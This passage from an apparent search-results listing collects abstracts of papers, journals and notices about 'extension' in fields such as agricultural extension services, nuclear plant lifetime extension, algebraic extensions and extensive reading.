vulgaris was confirmed by histopathological and immunohistological examination. Pulse therapy with monthly parenteral dexamethasone and cyclophosphamide pulse was instituted. The cutaneous lesions on healing formed extensive keloidal scars despite high dose of monthly corticosteroid therapy. 11. Extension of the nuclear power plant lifetime International Nuclear Information System (INIS) Keramsi, Alain 2011-01-01 After a presentation of the French nuclear context (history of the reactor fleet, choice of reactor type, PWR operation principle, competitiveness, environmental performance), this Power Point presentation addresses the context and challenges of the operation lifetime (average fleet age in different countries, examples of extensions, case of the United States, what is at stake with lifetime extension, decennial visits, EDF strategy), discusses the EDF's safety objectives (definition of the three main safety functions, impact of the operation duration and of the coexistence of two generations for the safety functions), discusses how to manage the ageing phenomenon for replaceable and non-replaceable components 12. On loop extensions and cohomology of loops OpenAIRE Benítez, Rolando Jiménez; Meléndez, Quitzeh Morales 2015-01-01 In this paper are defined cohomology-like groups that classify loop extensions satisfying a given identity in three variables for association identities, and in two variables for the case of commutativity. It is considered a large amount of identities. This groups generalize those defined in works of Nishigori [2] and of Jhonson and Leedham-Green [4]. It is computed the number of metacyclic extensions for trivial action of the quotient on the kernel in one particular case for left Bol loops a... 13. Mathematics for common entrance three (extension) answers CERN Document Server Alexander, Serena 2015-01-01 This book contains answers to all exercises featured in the accompanying textbook Mathematics for Common Entrance Three (Extension) , which provides essential preparation for Level 3 of the ISEB 13+ Mathematics exam, as well as for CASE and other scholarship exams. - Clean, clear layout for easy marking. - Includes examples of high-scoring answers with diagrams and workings. Also available to purchase from the Galore Park website www.galorepark.co.uk :. - Mathematics for Common Entrance Three (Extension). - Mathematics for Common Entrance One. - Mathematics for Common Entrance One Answers. - M 14. Global Approaches to Extension Practice: A Journal of Agricultural ... African Journals Online (AJOL) Global Approaches to Extension Practice (GAEP), A publication of the Department of Agricultural Extension, Federal University of Technology, Owerri, Imo State, Nigeria is an international journal which considers articles from all areas of Agricultural Extension: rural sociology, environmental extension, extension ... 15. Software extension and integration with type classes DEFF Research Database (Denmark) Lämmel, Ralf; Ostermann, Klaus 2006-01-01 expressiveness, by using the language concept of \\emph{type classes}, as it is available in the functional programming language Haskell. A detailed comparison with related work shows that type classes provide a powerful framework in which solutions to known software extension and integration problems can...... be provided. We also pinpoint several limitations of type classes in this context.... Science.gov (United States) Park, Jeongyeon 2016-01-01 This study explores whether an extensive reading (ER) approach can enhance L2 learners' writing performance in an English for Academic Purposes context. Two classes were compared in terms of writing improvement after one semester: a 'traditional' writing class primarily focused on writing practice and grammar instruction, and an ER class in which… 17. Design Extension in Post Fukushima Scenario International Nuclear Information System (INIS) Kumar, Prabhat 2013-01-01 Post Fukushima Flooding Review and Design Extension: • Increased tsunami height; • Increased tsunami wall;• Increased size of storm water drains; • Non return gates in storm water drains; • Wall around fore bay and sea water pump house; • Sealing of NIB penetrations for a higher tsunami; • Alternative approach road; • NICB elevation; • Perpendicular to coast line 18. On an extension of a combinatorial identity On an extension of a combinatorial identity. M RANA and A K AGARWAL. Center for Advanced Study in Mathematics, Panjab University, Chandigarh 160 014,. India. E-mail: [email protected]. MS received 22 August 2007. Abstract. Using Frobenius partitions we extend the main results of [4]. This leads to an infinite family of ... 19. Equivalence relations of AF-algebra extensions In this paper, we consider equivalence relations of *-algebra extensions and describe the relationship between the isomorphism equivalence and the unitary equivalence. We also show that a certain group homomorphism is the obstruction for these equivalence relations to be the same. 20. newspapers' agricultural agenda setting and extension agents ... African Journals Online (AJOL) p2333147 issue 'agendas' there is need, as asserted by McQuail (1987:75) for a combination of content analysis showing media attention to different issues in the relevant period and some indication of relevant media used by the public concerned, in this study, the extension agents. Agenda-setting according to Davis and Robinson ... 1. Seroprevalence Study Of Bovine Brucellosis In Extensive ... African Journals Online (AJOL) The prevalence of bovine brucellosis was measured in cross sectional study in Jimma zone, Western Ethiopia using Rose Bengal Plate Test (RBT) and CFT from October 2003 to April 2004. The study animals consisted of 1305 local breed found in extensive system in five districts of in the zone. The overall individual animal ... 2. Obstructions to Clifford system extensions of algebras Springer Verlag Heidelberg #4 2048 1996 Dec 15 10:16:45 The problem of Clifford system extensions resides in the classification and the construction ... The construction of T ( ) is closely analogous to a construction by Kanzaki [9], for a description of the. Chase-Harrison-Rosenberg seven term exact sequence [2] about the Brauer group. .... Cliffk(G, R; ) = χ−1( ) the fiber of χ over. 3. FISHERIES EXTENSION SERVICES IN OGUN STATE | Olopade ... African Journals Online (AJOL) The study attempts to assess the current trends, impact and constraints of fisheries extension services to artisanal fishers in Ogun Waterside Local Government Area of Ogun State. The survey approach was used to generate the needed data using 120 structured questionnaires. Simple statistical techniques such as means ... 4. FISHERIES EXTENSION ACTIVITIES AMONG WOMEN IN EPE ... African Journals Online (AJOL) The study focuses on fisheries extension activities among women in Epe local Government area of Lagos State. A total 106 questionnaires were obtained from 120 randomly administered questionnaires. The result shows that majority of the women are sole owners of the businesses and they obtained fishing skills from their ... 5. Journal of Environmental Extension: Editorial Policies African Journals Online (AJOL) Focus and Scope. Journal of Environmental Extension is to be published annually to generate ideas on formulation, packaging, dissemination and consequential impacts of ideas/policies relating to the quality and sustainability of the environment. Focus of the Journal is on: Health Agriculture Technology 6. ANTLR Tree Grammar Generator and Extensions Science.gov (United States) Craymer, Loring 2005-01-01 A computer program implements two extensions of ANTLR (Another Tool for Language Recognition), which is a set of software tools for translating source codes between different computing languages. ANTLR supports predicated- LL(k) lexer and parser grammars, a notation for annotating parser grammars to direct tree construction, and predicated tree grammars. [ LL(k) signifies left-right, leftmost derivation with k tokens of look-ahead, referring to certain characteristics of a grammar.] One of the extensions is a syntax for tree transformations. The other extension is the generation of tree grammars from annotated parser or input tree grammars. These extensions can simplify the process of generating source-to-source language translators and they make possible an approach, called "polyphase parsing," to translation between computing languages. The typical approach to translator development is to identify high-level semantic constructs such as "expressions," "declarations," and "definitions" as fundamental building blocks in the grammar specification used for language recognition. The polyphase approach is to lump ambiguous syntactic constructs during parsing and then disambiguate the alternatives in subsequent tree transformation passes. Polyphase parsing is believed to be useful for generating efficient recognizers for C++ and other languages that, like C++, have significant ambiguities. 7. Effectively Communicating Science to Extension Audiences Science.gov (United States) Robinson, Patrick 2013-01-01 This article discusses the concept of "framing" within the context of relevant communication and psychological research and considers its potential applicability to Extension science communication. Examples of research-based support for the framing of scientific issues are presented, along with a literature-based discussion of the… 8. Banana Algebra: Compositional Syntactic Language Extension DEFF Research Database (Denmark) Andersen, Jacob; Brabrand, Claus; Christiansen, David Raymond 2013-01-01 We propose an algebra of languages and transformations as a means of compositional syntactic language extension. The algebra provides a layer of high-level abstractions built on top of languages (captured by context-free grammars) and transformations (captured by constructive catamorphisms). The ... 9. Principles Guiding Vocabulary Learning through Extensive Reading Science.gov (United States) Nation, Paul 2015-01-01 Extensive reading is one of a range of activities that can be used in a language learning course. Ideally, the choice of activities to go into a course should be guided by principles which are well supported by research. Similarly, the way each of those activities is used should be guided by well-justified principles. In this article, we look at… 10. Improving Generation Y Volunteerism in Extension Programs Science.gov (United States) Andrews, Kevin B.; Lockett, Landry L. 2013-01-01 Members of Generation Y have many positive attributes that make them attractive to Extension volunteer administrators as a potential source of labor. However, they think differently, have unique needs, require new management styles, and have less tolerance for unpleasant working conditions than previous generations. Additionally, they are engaged… 11. Equivalence relations of AF-algebra extensions Home; Journals; Proceedings – Mathematical Sciences; Volume 120; Issue 2. Equivalence Relations of -Algebra Extensions. Changguo Wei. Volume 120 Issue 2 April 2010 ... Author Affiliations. Changguo Wei1. School of Mathematical Sciences, Ocean University of China, Qingdao 266071, People's Republic of China ... 12. Issues for Agricultural Extension Policy in Nigeria African Journals Online (AJOL) Agriculture is the bedrock of economic development in Nigeria. However, the development of the ... This policy direction placed additional responsibilities on extension by including sustainable development ... years and the recent trends in agricultural development world wide have necessitated the formulation of more ... 13. Supersymmetric Extension of Technicolor & Fermion Mass Generation DEFF Research Database (Denmark) Antola, Matti; Di Chiara, Stefano; Sannino, Francesco 2012-01-01 We provide a complete extension of Minimal Walking Technicolor able to account for the standard model fermion masses. The model is supersymmetric at energies greater or equal to the technicolor compositeness scale. We integrate out, at the supersymmetry breaking scale, the elementary Higgses. We... 14. On Viviani's Theorem and Its Extensions Science.gov (United States) Abboud, Elias 2010-01-01 Viviani's theorem states that the sum of distances from any point inside an equilateral triangle to its sides is constant. Here, in an extension of this result, we show, using linear programming, that any convex polygon can be divided into parallel line segments on which the sum of the distances to the sides of the polygon is constant. Let us say… 15. Emergency Food Programs: Untapped Opportunities for Extension? Science.gov (United States) Mobley, Amy R. 2012-01-01 This article reports results from a questionnaire that assessed the frequency and type of nutrition questions asked at emergency food programs to determine if Extension professionals need to increase direct outreach efforts. Emergency food program workers (n = 460) were recruited via mail to complete a self-administered survey. More than one-third… 16. Extending the Agricultural Extension Model. Preliminary Draft. Science.gov (United States) Rogers, Everett M.; And Others The purposes of this report are: to describe the main elements of the U.S. agricultural extension model and its effects on the agricultural revolution; to analyze attempts to extend this model to non-agricultural technology and/or to less developed countries; and to draw general conclusions about the diffusion of technological innovations, with… 17. Need for Methamphetamine Programming in Extension Education Science.gov (United States) Beaudreault, Amy R.; Miller, Larry E. 2011-01-01 The study reported sought to identify the prevention education needs involving methamphetamine through survey methodology. The study focused on a random sample of U.S. states and the Extension Directors within each state, resulting in a 70% response rate (n = 134). Findings revealed that 11% reported they had received methamphetamine user… 18. EXTENSION OF THE PROGRESSIVE RETIREMENT PROGRAMME CERN Multimedia Human Resources Division 2002-01-01 In accordance with the provisions agreed by the Finance Committee and Council in March and June 2000, respectively, the Director-General has approved the extension of the Progressive Retirement Programme with effect from 1 April 2001, for one year. Human Resources Division Tel. 72808/74128 19. A Graph Library Extension of SVG DEFF Research Database (Denmark) Nørmark, Kurt 2007-01-01 be aggregated as a single node, and an entire graph can be embedded in a single node. In addition, a number of different graph animations are described. The starting point of the SVG extension is a library that provides an exact of mirror of SVG 1.1 in the functional programming language Scheme. Each element... 20. Assessment Of Shell Petroleum Development Company Extension ... African Journals Online (AJOL) The study assessed Shell Petroleum Development Company Extension Services in Etche Local Government Area of Rivers State, Nigeria. Data were gathered form four categories of respondents drawn from the Company\\'s staff and the communities. A total of 180 respondents participated in the study. means scores and ... 1. Communication for Rural Innovation : rethinking agricultural extension NARCIS (Netherlands) Leeuwis, C.; Ban, van den A.W. 2004-01-01 This important book is the re-titled third edition of the extremely well received and widely used Agricultural Extension (van den Ban & Hawkins, 1988, 1996). Building on the previous editions, Communication for Rural Innovation maintains and adapts the insights and conceptual models of value 2. 77 FR 35366 - Agency Information Collection Extension Science.gov (United States) 2012-06-13 ... following Web site: http://www1.eere.energy.gov/wip/historic_preservation.html . SUPPLEMENTARY INFORMATION... DEPARTMENT OF ENERGY Office of Energy Efficiency and Renewable Energy Agency Information... Department of Energy (DOE) has submitted an information collection request to the OMB for extension under the... 3. Women Empowerment And Agricultural Extension Policy: The ... African Journals Online (AJOL) This paper examined the role and challenges of extension agents in empowering women in a bid to revamp the agricultural sector. The activities of women in agricultural production are reviewed against the backdrop of global shift to gender sensitivity, particularly the emphasis on the role of women in agriculture. The paper ... Science.gov (United States) Meng, Fanshao 2009-01-01 A good reading competence is a necessity for those studying English for academic and occupational purposes. Based on the results of previous research, theory and practice on L2 Extensive Reading, this paper analyses current situation for teaching and learning reading in our Chinese universities and proposes practical applications of extensive… Science.gov (United States) Jacobs, George M. 2016-01-01 How can teachers motivate students to read extensively in a second language? One strategy is for teachers to read aloud to students to promote the joys of reading generally, to build students' language skills and to introduce students to specific authors, book series, genres, websites, etc. This article begins by discussing why teachers might want… Science.gov (United States) He, Mu 2014-01-01 Research has shown a wide range of learning benefits accruing from extensive reading. Not only is there improvement in reading, but also in a wide range of language uses and areas of language knowledge. However, few research studies have examined reading speed. The existing literature on reading speed focused on students' reading speed without… 7. African Journal of Livestock Extension: Contact African Journals Online (AJOL) Principal Contact. DR. G.R.K. Sharma Editor-in-Chief Dept. of Vet & A. H. Extension College of Vet. Science A.N.G.R. Agricultural University Tirupati – 517502 Andhra Pradesh India Email: [email protected] ... 8. Subintegrality, invertible modules and Laurent polynomial extensions In [4], Roberts and Singh have introduced the group 그(A,B) to generalize a result of. Dayton. The relation between the group 그(A,B) and subintegral extensions has been investigated by Reid, Roberts and Singh in a series of papers. Recently in [5], Sadhu and. Singh have proved that A is subintegrally closed in B if and ... 9. Paramecium: An Extensible Object-Based Kernel NARCIS (Netherlands) van Doorn, L.; Homburg, P.; Tanenbaum, A.S. 1995-01-01 In this paper we describe the design of an extensible kernel, called Paramecium. This kernel uses an object-based software architecture which together with instance naming, late binding and explicit overrides enables easy reconfiguration. Determining which components reside in the kernel protection 10. 77 FR 70995 - Agency Information Collection Extension Science.gov (United States) 2012-11-28 ... NWPA-830G is an Appendix to the Standard Contract for Disposal of Spent Nuclear Fuel and/or High-Level... Title: Standard Contract for Disposal of Spent Nuclear Fuel and/or High-Level Radioactive Waste... DEPARTMENT OF ENERGY Energy Information Administration Agency Information Collection Extension... 11. Transforming agriculture through contracted extension service ... African Journals Online (AJOL) Transformation of small holder agriculture from subsistence farming to agribusiness focused systems, is paramount towards attainment of Kenya's vision 2030 and the Millennium Development Goals. This requires extension service delivery systems that focus on addressing challenges within agricultural product value ... 12. Constructing Natural Extensions of Propositional Logics Czech Academy of Sciences Publication Activity Database 2016-01-01 Roč. 104, č. 6 (2016), s. 1179-1190 ISSN 0039-3215 R&D Projects: GA ČR GA13-14654S Institutional support: RVO:67985807 Keywords : abstract algebraic logic * consequence relations * propositional logic * natural extensions * transfer theorems Subject RIV: BA - General Mathematics Impact factor: 0.589, year: 2016 13. Extension agents' technical knowledge requirements for effective ... African Journals Online (AJOL) Technical knowledge requirements of extension agents were investigated in this study. Data for the study was collected with the aid of structured questionnaire administered to the 78 respondents. It was found that respondents were mainly males, were married, were in the middle age category, had BSc/HND, made ... 14. Department of Agricultural Extension and Rural Development ... African Journals Online (AJOL) USER 2017-01-27 262. Ethiopian Journal of Environmental Studies & Management 10(2): 262 – 275, 2017. ISSN:1998-0507 doi: http://dx.doi.org/10.4314/ejesm.v10i2.12. Submitted: January 27, 2017. Accepted: March 20, 2017. Department of Agricultural Extension and Rural Development, University of Ilorin, Ilorin. Nigeria. Abstract. 15. Rural Development And Agricultural Extension Administration In ... African Journals Online (AJOL) This paper reviewed the wide range of policies and approaches formulated and implemented to effect agricultural and rural development in Nigeria. The paper reveals that the common feature of all the strategies is the use of institutionalized agricultural extension service, devoted principally to augment smallholder ... 16. Ethics and morals in the extension work Directory of Open Access Journals (Sweden) Fátima Lourdes Morales Intriago 2017-05-01 Full Text Available One of the main discussions about agents that provide rural extension is the lack of adequate proposals for the reality of farmers. The exyensionists work according to ethics and morals. Was carried out a theoretical search by made analyzing concepts about these terms and that are applied by extension agents. In This paper discusses how agents act with respect to the aforementioned notions and the conflicts they can cause with rural communities. It was found that the extensionist’s behavior is based on its values, norms and sanctions formation that can be object, which determines the changes that occur in the communities served. On the other hand, farmers do not receive appropriate attention by organisms that facilitate the Rural Extension, ignoring their interests and priorities. In addition, agents, as servants of institutions that provide assistance and extension, lose autonomy during the contact with communities. It was concluded that agents act correctly according to morality, as well as what concerns to ethics, since lowing the rules of the institution to which they belong, which does not always match with what rural people pursued. 17. Particle Swarm Optimisation with Spatial Particle Extension DEFF Research Database (Denmark) Krink, Thiemo; Vesterstrøm, Jakob Svaneborg; Riget, Jacques 2002-01-01 In this paper, we introduce spatial extension to particles in the PSO model in order to overcome premature convergence in iterative optimisation. The standard PSO and the new model (SEPSO) are compared w.r.t. performance on well-studied benchmark problems. We show that the SEPSO indeed managed to... 18. Entrepreneurial Extension Conducted via Social Media Science.gov (United States) Cornelisse, Sarah; Hyde, Jeffrey; Raines, Christopher; Kelley, Kathleen; Ollendyke, Dana; Remcheck, James 2011-01-01 The widespread availability of and access to the Internet have led to the development of new forms of communication. Collectively termed "social media," these new communication tools have created vast opportunities for Extension professionals in how they perform their work and how businesses interact with consumers. This article outlines currently… 19. Subintegrality, invertible modules and Laurent polynomial extensions Indian Acad. Sci. (Math. Sci.) Vol. 125, No. 2, May 2015, pp. 149–160. c Indian Academy of Sciences. Subintegrality, invertible modules and Laurent polynomial extensions. VIVEK SADHU. Department of Mathematics ...... comments which have improved the exposition. Further, he would like to thank CSIR,. India for financial ... 20. Communication for strengthening agricultural extension and rural ... African Journals Online (AJOL) This paper argues that extension workers need training in Communication for Development (C4D), an emerging body of knowledge for addressing problems, such as participation, integration and capacity building for them to relate more effectively with development partners. Thus, this paper proposes a C4D framework for ... 1. Catastrophic failure of polymer melts during extension DEFF Research Database (Denmark) Rasmussen, Henrik K. 2013-01-01 Numerical flow modeling has been applied to study the break of monodisperse polymer melts during extension. These continuum mechanical based computations are within the ideas of the microstructural ’interchain pressure’ theory. Calculated breaks, a result of small initial sample imperfections, ag... 2. Extension Procedures for Confirmatory Factor Analysis Science.gov (United States) Nagy, Gabriel; Brunner, Martin; Lüdtke, Oliver; Greiff, Samuel 2017-01-01 We present factor extension procedures for confirmatory factor analysis that provide estimates of the relations of common and unique factors with external variables that do not undergo factor analysis. We present identification strategies that build upon restrictions of the pattern of correlations between unique factors and external variables. The… 3. Livestock extension practice and competency among agricultural ... African Journals Online (AJOL) The test-retest technique was used to pre-test the instrument, yielding a coefficient r=0.91. Descriptive, correlation and t-test statistics were used to analyze data. Results revealed that about 40% of respondents engaged in livestock extension activities in the last two years, while about 16% actually specialized in Animal ... 4. Testing Extension Services through AKAP Models Science.gov (United States) De Rosa, Marcello; Bartoli, Luca; La Rocca, Giuseppe 2014-01-01 Purpose: The aim of the paper is to analyse the attitude of Italian farms in gaining access to agricultural extension services (AES). Design/methodology/approach: The ways Italian farms use AES are described through the AKAP (Awareness, Knowledge, Adoption, Product) sequence. This article investigated the AKAP sequence by submitting a… 5. Towards professionalism in agricultural extension: The professional ... African Journals Online (AJOL) 6. 78 FR 31885 - Patent Term Extension Science.gov (United States) 2013-05-28 ... DEPARTMENT OF COMMERCE Patent and Trademark Office Patent Term Extension ACTION: Proposed collection; comment request. SUMMARY: The United States Patent and Trademark Office (USPTO), as part of its... States Patent and Trademark Office, P.O. Box 1450, Alexandria, VA 22313-1450. Federal Rulemaking Portal... 7. Extensively Drug-Resistant Tuberculosis, Burkina Faso OpenAIRE Saleri, Nuccia; Badoum, Gisèle; Ouedraogo, Martial; Dembélé, Sary M.; Nacanabo, Rachel; Bonkoungou, Victor; Cirillo, Daniela; Pinsi, Gabriele; Matteelli, Alberto 2010-01-01 Because data from countries in Africa are limited, we measured the proportion of extensively drug-resistant (XDR) tuberculosis (TB) cases among TB patients in Burkina Faso for whom retreatment was failing. Of 34 patients with multidrug-resistant TB, 2 had an XDR TB strain. Second-line TB drugs should be strictly controlled to prevent further XDR TB increase. 8. Non extensive considerations on a Machian Universe Energy Technology Data Exchange (ETDEWEB) Abreu, Everton M.C.; Ananias Neto, Jorge [Universidade Federal Rural do Rio de Janeiro (UFRRJ), Seropedica, RJ (Brazil); Universidade Federal de Juiz de Fora, MG (Brazil) 2013-07-01 Full text: There is an extension of the usual Boltzmann-Gibbs theory (BG) that is called Tsallis statistical theory (TT). To sum up, the formalism initially considers the entropy formula as a non extensive (NE) quantity where there is a parameter q that measures the so-called degree of nonextensivity. This formalism has been successfully applied in many physical models. An important feature is that when q —> 1 we recover the usual Boltzmann- Gibbs theory, i.e., we have an extensive theory The dependence of the mass of a particle on the rest of the universe was argued by Mach in the nineteenth century itself in what is now famous as Machs Principle. The Principle is counterintuitive in that we tend to consider the mass which represents the quantity of matter in a particle to be an intrinsic property of the particle. But the following statement of Machs Principle shows it to be otherwise thus going counter to ideas of locality and causality. The purpose of this paper is to use the non extensive concept in order to analyze the Machian view of the Universe. We will calculate the Machian components of the theory as functions of the nonextensivity parameter q and we will discuss its consequences. We will also show the influence of the asymptotic behavior in these Machian q-parameters. (author) 9. South African Journal of Agricultural Extension African Journals Online (AJOL) The South African Journal of Agricultural Extensionaims to: * advance and apply the science of extension and of rural development as scientific discipline by stimulating thought, study, research, discussion and the publication and exchange of knowledge both nationally and internationally. * promote the professionalism ... 10. Extension Study Group Members View Their Clubs and Extension Home Economists. ANREI Publication No. 28. Science.gov (United States) Miller, Mason E. The data presented in this report were selected from a 1972 study of Michigan Extension Study Group (ESG) members. Included are data descriptive of the women themselves and their situation (area and type of home, age, income, ESG experience, and especially their attitudes toward their ESG and their Extension Home Economists). Selected findings are… 11. Collaboration of Extension and Grape Industry Members to Create a New Extension Publication Science.gov (United States) Stafne, Eric T.; Ingels, George; Ingels, Jane; Carroll, Becky 2016-01-01 Collaboration is an important part of the interaction between Extension and industry. Successful sharing of workload can provide benefits for both parties. A project to create a workbook to address vineyard sustainability was initiated by members of the Oklahoma grape industry with assistance from land-grant university Extension. Productive… 12. The Changing Nature of the Cooperative Extension System: Views of Leading Extension Administrators. Science.gov (United States) 1993-01-01 Four administrators of the Cooperative Extension System share their views concerning recent substantial changes in the system's focus of programing, sources of funding, and organizational structures; the need for all disciplines involved in extension to grapple with societal problems; and relationships with institutions of higher education. (LP) 13. Tampa Bay Extension Agents’ Views of Urban Extension: Philosophy and Program Strategies Directory of Open Access Journals (Sweden) Amy Harder 2017-06-01 Full Text Available The purpose of this article was to explore the concept of urban Extension as perceived by Extension agents within the Tampa Bay area, one of Florida’s fastest growing metropolitan areas. From a theoretical perspective, it is critical to understand Extension agents’ beliefs about urban Extension because behaviors are directly related to attitudes (Ajzen, 2012. In 2016, a qualitative investigation was undertaken to explore the perspectives of 23 agents working within the Tampa Bay area. Results showed the majority of agents believed that context and client needs are unique for urban Extension, and that to a lesser extent, unique agent expertise is required. Further, these beliefs impacted how agents reported their approach to programming, with an emphasis on providing convenience and seeking partnerships. Difficulties were identified related to identifying the role of Extension in a resource-rich environment of service providers, which contributed to the existence of a perceived disconnect between urban audiences and Extension. Opportunities exist for Extension leadership to provide strategic organizational support that will enhance agents’ abilities to succeed in the metropolitan environment. 14. Dirac Triplet Extension of the MSSM CERN Document Server Alvarado, C.; Martin, A.; Ostdiek, B. 2015-08-13 In this paper we explore extensions of the Minimal Supersymmetric Standard Model involving two $SU(2)_L$ triplet chiral superfields that share a superpotential Dirac mass yet only one of which couples to the Higgs fields. This choice is motivated by recent work using two singlet superfields with the same superpotential requirements. We find that, as in the singlet case, the Higgs mass in the triplet extension can easily be raised to $125\\,\\text{GeV}$ without introducing large fine-tuning. For triplets that carry hypercharge, the regions of least fine tuning are characterized by small contributions to the $\\mathcal T$ parameter, and light stop squarks, $m_{\\tilde t_1} \\sim 300-450\\,\\text{GeV}$; the latter is a result of the $\\tan\\beta$ dependence of the triplet contribution to the Higgs mass. Despite such light stop masses, these models are viable provided the stop-electroweakino spectrum is sufficiently compressed. 15. Geometric extension through Schwarzschild r = 0 International Nuclear Information System (INIS) Lynden-Bell, D.; Katz, J.; Hebrew Univ., Jerusalem 1990-01-01 Singularities in space-time are not necessarily cancers in the manifold but can herald interesting topological change in the space-time at places where there are several different tangent Minkowski spaces. Most discussions of gravitational collapse cease when space-time becomes singular. In the 'hour-glass' universe we have an example where the singularity develops in empty space; here we give a geometrical extension through the singularity in which geodesics that enter it emerge into a new space. The result extends Schwarzschild space and is periodic in 'extended' Penrose coordinates. There is a topological singularity but no mass at r = 0. The extension is mildly nonanalytic but unique. It is based on the concept that time does not stop and that empty space-times which develop singularities must still have zero Ricci tensors even where the Riemann tensor becomes infinite. (author) 16. EPRI nuclear plant life extension program overview International Nuclear Information System (INIS) Rubio, A.; Carey, J.J.; Lapides 1986-01-01 In 1978-1979, EPRI undertook a series of studies which suggested that extending the operation of current nuclear generating units beyond their nominal 40-year license term was both technically feasible and economically attractive. In 1984, these results were reviewed and confirmed and more detailed evaluations initiated. Major elements include: a) identification of life extension as a strategic element of the EPRI Nuclear Division program; b) formulation of a joint EPRI/DOE program plan to culminate in the licensing of a generating unit(s) for extended life; and, c) initiation of two extensive studies, by and with utilities, to provide guidelines for such achievement. The pilot studies began in early 1985. This paper describes the background and status of these efforts to date 17. [Juvenile nasopharyngeal angiofibroma with orbital extension]. Science.gov (United States) Hervás Ontiveros, A; España Gregori, E; Climent Vallano, L; Rivas Rodero, S; Alamar Velázquez, A; Simal Julián, J A 2015-01-01 The case is presented of a 21 year-old male with a history of left proptosis and diplopia of two weeks of onset. The MRI showed an ethmoid-orbital vascular lesion with anterior skull base invasion and orbital extension. Biopsy of the ethmoid confirmed fibrovascular tissue, which supported the diagnosis of angiofibroma. It is a benign neoplasm with local characteristics of malignancy due to its ability to invade adjacent areas. In this case, the debut presented with manifestations of orbital extension. A broad and multidisciplinary approach is needed in order to improve prognosis. Copyright © 2013 Sociedad Española de Oftalmología. Published by Elsevier España, S.L.U. All rights reserved. 18. States On Orthocomplemented Difference Posets (Extensions) Science.gov (United States) Hroch, Michal; Pták, Pavel 2016-08-01 We continue the investigation of orthocomplemented posets that are endowed with a symmetric difference (ODPs). The ODPs are orthomodular and, therefore, can be viewed as "enriched" quantum logics. In this note, we introduced states on ODPs. We derive their basic properties and study the possibility of extending them over larger ODPs. We show that there are extensions of states from Boolean algebras over unital ODPs. Since unital ODPs do not, in general, have to be set-representable, this result can be applied to a rather large class of ODPs. We then ask the same question after replacing Boolean algebras with "nearly Boolean" ODPs (the pseudocomplemented ODPs). Making use of a few results on ODPs, some known and some new, we construct a pseudocomplemented ODP, P, and a state on P that does not allow for extensions over larger ODPs. 19. Controleum - an independently extensible control system DEFF Research Database (Denmark) Jensen, Martin Lykke Rytter 2014-01-01 - hard concerns are constraints that must always be met, while soft concerns describe desirable goals that may be prioritized by the system's user. The extensible controller uses a genetic algorithm to continuously resolve conflicts among independently developed control concerns. Both new software...... to introduce a new component without performing a global integrity check. Avoiding a global integrity check relies on anticipating what kind of extensions are required in the future and designing a suitable interface and coordination mechanism, so that conflicts among mutually unaware components can...... be resolved automatically. Typical control system components are concerned with the way in which actuators are controlled. Combining mutually unaware control system components that share interest in the same actuators are likely to lead to complex conflicts, thus making control systems a particularly... 20. Mathematical model of subscriber extension line OpenAIRE Petříková, Iva; Diviš, Zdeněk; Tesař, Zdeněk 2012-01-01 The paper focuses on measurement properties of metallic subscriber extension lines to build regression mathematical model for a symmetric pair cable. The regression model is compared with an analytical model based on a theoretical description of transfer parameters for this type of line. The output of the paper should demonstrate the impact of electromagnetic interference on the symmetric pair. The paper also describes the method to identify the interference sources and ... 1. Emergence of Extensively Drug Resistant Tuberculosis Centers for Disease Control (CDC) Podcasts 2007-03-01 Extensively drug-resistant tuberculosis (XDR TB) outbreaks have been reported in South Africa, and strains have been identified on 6 continents. Dr. Peter Cegielski, team leader for drug-resistant TB with the Division of Tuberculosis Elimination at CDC, comments on a multinational team's report on this emerging global public health threat.  Created: 3/1/2007 by Emerging Infectious Diseases.   Date Released: 3/26/2007. 2. Learning PrimeFaces extensions development CERN Document Server Jonna, Sudheer 2014-01-01 This book provides a step by step approach that explains the most important extension components and their features. All the major features are explained by using the JobHub application with supporting screenshots.If you are an intermediate to advanced level user (or developer) who already has a basic working knowledge of PrimeFaces, then this book is for you.The only thing you need to know is Java Server Faces(JSF). 3. Equivalence relations of AF-algebra extensions classifications of C*-algebras together with K-theory and index theory (see [2]). The available classification results of C∗ ... Let ei: 0 → B αi. → Ei βi. → A → 0 be two extensions of A by B with Busby invariants τi for i = 1, 2. Then (E1,α1,β1) and (E2,α2,β2) are called congruent (called 'strongly isomorphic' in [2]), denoted by e1 ... 4. Stable Extensions with(out) Gravity DEFF Research Database (Denmark) Antipin, Oleg; Krog, Jens; Mojaza, Matin 2014-01-01 We investigate the vacuum stability as well as the gravitational corrections in extensions of the Standard Model featuring a new complex scalar, and two Dirac fermions for different choices of the hypercharge of the scalar and one of the two fermions. The neutral fermion acquires loop-induced mag...... and discover that the models can be compatible with the asymptotically safe gravity scenario at the price of a heavier Higgs and lighter top mass... 5. Extensions and degeneration of spectral triples DEFF Research Database (Denmark) Christensen, Erik; Ivan, Cristina 2009-01-01 To a compact non commutative metric space associated to a C*-algebra A and an extension E of A, we construct 2-parameter family of compact non commutative metric spaces associated to E. It is shown that under certain limits along paths in the parameter space the corresponding spaces converge...... in the quantum Gromov-Hausdorff metric towards either the given non commutative metric space or towards a compact non commutative metric space associated to the compact operators.... 6. Definable maximal discrete sets in forcing extensions DEFF Research Database (Denmark) Törnquist, Asger Dag; Schrittesser, David 2018-01-01 Let  be a Σ11 binary relation, and recall that a set A is -discrete if no two elements of A are related by . We show that in the Sacks and Miller forcing extensions of L there is a Δ12 maximal -discrete set. We use this to answer in the negative the main question posed in [5] by showing... 7. Deformed Fredkin spin chain with extensive entanglement Science.gov (United States) Salberger, Olof; Udagawa, Takuma; Zhang, Zhao; Katsura, Hosho; Klich, Israel; Korepin, Vladimir 2017-06-01 We introduce a new spin chain which is a deformation of the Fredkin spin chain and has a phase transition between bounded and extensive entanglement entropy scaling. In this chain, spins have a local interaction of three nearest neighbors. The Hamiltonian is frustration-free and its ground state can be described analytically as a weighted superposition of Dyck paths that depends on a deformation parameter t. In the purely spin 1/2 case, whenever t\ 8. Radurisation of broilers for shelf life extension International Nuclear Information System (INIS) Bok, H.E.; Holzapfel, W.H.; Van der Linde, H.J. 1982-01-01 Radurization is discussed as a method for the shelf life extension of refrigerated chicken carcasses. One of the advantages is that radurization eliminates potential food pathogenic bacteria like Salmonella in the chicken carcasses. Materials and methods for the radurization of chicken are discussed. The objective of the investigation was to determine the influence of different irradiation doses and storage conditions on the microbiological shelf life and organoleptic quality of fresh broilers 9. Mucocele and pyocele with marked intracranial extension Energy Technology Data Exchange (ETDEWEB) Tsuchiya, Kazuhiro; Machida, Tohru; Iio, Masahiro 1984-08-01 Two cases are presented with frontal sinus pyocele and fronto-ethmoid sinus mucocele in which marked intracranial extension is shown. Their intracranial part 